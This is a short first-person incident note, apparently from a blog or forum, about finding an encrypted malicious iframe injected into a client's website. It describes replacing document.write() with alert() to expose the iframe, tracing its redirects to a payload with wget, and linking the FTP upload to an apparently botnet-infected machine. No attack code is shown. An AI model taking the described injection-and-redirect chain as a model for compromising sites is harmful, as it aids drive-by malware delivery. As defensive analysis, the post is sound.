I was able to confirm the site was compromised without running the code on a VM or changing with noscript on my machine by replacing all document.write() calls with alert().
Just as expected there was a nice iframe. Using wget I then confirmed that the iframe redirected to another iframe which redirected to a payload. The same network delivering the payload had also uploaded the modified files via ftp a few days earlier.
Since I found no cracking attempts on the sites ftp account I’m thinking the client’s client machine is part of the happy botnet.
This is the first time I’ve ran into an encrypted iframe and thought it was interesting.